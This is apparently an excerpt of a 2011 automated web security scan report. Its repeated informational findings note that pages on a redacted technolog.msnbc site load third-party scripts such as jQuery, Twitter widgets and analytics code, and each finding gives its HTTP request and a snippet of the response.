<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.340. http://technolog.msnbc.redacted/facebook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /facebook

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /facebook HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127194

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.341. http://technolog.msnbc.redacted/featured

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /featured

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /featured HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:30:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139027

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.342. http://technolog.msnbc.redacted/google

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /google

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /google HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:33:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132377

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.343. http://technolog.msnbc.redacted/helen-a-s-popkin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /helen-a-s-popkin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /helen-a-s-popkin HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:37:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134789

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.344. http://technolog.msnbc.redacted/internet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /internet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /internet HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149136

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.345. http://technolog.msnbc.redacted/ipad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /ipad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ipad HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:33:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132760

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
